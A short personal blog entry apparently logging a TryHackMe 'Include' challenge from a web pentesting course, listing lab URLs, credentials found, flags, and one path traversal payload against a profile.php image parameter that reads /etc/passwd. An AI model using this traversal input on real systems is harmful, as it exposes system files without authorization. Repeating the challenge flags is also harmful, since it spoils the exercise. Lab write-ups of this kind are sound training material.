Wednesday is here and it’s a short week for me as it’s my brithday this week and I have a few days off from work but that doesn’t mean the training stops (however there may not be a blog post everyday this week like normal)!
Also, today we have reached 100 day streak on THM!
Today we are at the end of the Advanced Server-Side Attacks section of the Web Application Pentesting pathway on THM and we find ourselves on the Include challenge room!
http://10.10.120.117:4000/
http://10.10.120.117:50000/
guest:guest
http://10.10.120.117:4000/admin/api
http://10.10.120.117:4000/admin/settings
ReviewApp – admin:admin@!!!
SysMonAppUsername – administrator:S$9$qk6d#**LQU
Flag – THM{!50_55Rf_1S_d_k3Y??!}
http://10.10.61.99:50000/profile.php?img=….//….//….//….//….//….//….//….//….//etc/passwd
joshua:123456
Flag – THM{505eb0fb8a9f32853b4d955e1f9123ea}
Until next time & don’t sleepwalk through life!
Farvel